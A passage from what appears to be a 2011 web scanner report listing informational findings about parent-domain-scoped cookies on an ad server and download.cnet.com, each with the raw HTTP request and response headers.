Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close


10.13. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0


10.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922091&PluID=0&w=300&h=600&ord=3092481&ncu=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/f%3B232232804%3B0-0%3B1%3B13500656%3B4252-336/280%3B39182405/39200192/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsG; B2=83xP08y8ysF7gi30820wsG; C3=0u3F8y8ysF0000040_0uO9820wsG0000002_; D3=0u3F00358y8ysF0uO9002P820wsG; E2=0a+r820wsG09MY8y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.15. http://download.cnet.com/1770-20_4-0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /1770-20_4-0.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1770-20_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: nb
Expires: Wed, 12 Jan 2011 13:01:01 GMT
Edge-Control: max-age=300
Age: 313
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=300
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 39010

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Search -
...[SNIP]...

10.16. http://download.cnet.com/8300-2007_4-12.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8300-2007_4-12.xml HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:20 GMT
Edge-Control: max-age=360
Age: 115
Content-Type: text/xml;charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 55525

<?xml version="1.0" encoding="UTF-8"?>


<!-- young tee -->


<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<link>http://download.cnet
...[SNIP]...

10.17. http://download.cnet.com/8301-2007_4-20015771-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20015771-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:19 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:00:36 GMT
Edge-Control: max-age=360
Age: 404
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:19 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:24 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 76026

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Trend Micro bets on the cloud | The Download Blog - Downl
...[SNIP]...

10.18. http://download.cnet.com/8301-2007_4-20027809-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:47 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 03:40:47 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:04:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowLat=1294803287158; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 03:34:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 03:34:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 04:34:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:34:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 03:35:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 69379

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Android lands cloud security from Trend Micro | The Downl
...[SNIP]...

10.19. http://download.cnet.com/8301-2007_4-20027809-12.html--

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027809-12.html--

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027809-12.html-- HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:24 GMT
Via: HTTP/1.0 phx1-rb-dl-app7.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:24 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:24 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:29 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 75826

<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head>


<title>Android lands cloud se
...[SNIP]...

10.20. http://download.cnet.com/8301-2007_4-20027865-12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /8301-2007_4-20027865-12.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20027865-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:32 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:32 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:32 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:37 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 64987

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>It's a black-and-white world: iPhone apps of the week | T
...[SNIP]...

10.21. http://download.cnet.com/download-blog/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /download-blog/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download-blog/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:47 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:05:47 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 104182

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Software news, tips and opinions from Download.com editor
...[SNIP]...

10.22. http://download.cnet.com/mac/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mac/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mac/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:49 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:06:58 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 51
Content-Type: text/html; charset=UTF-8
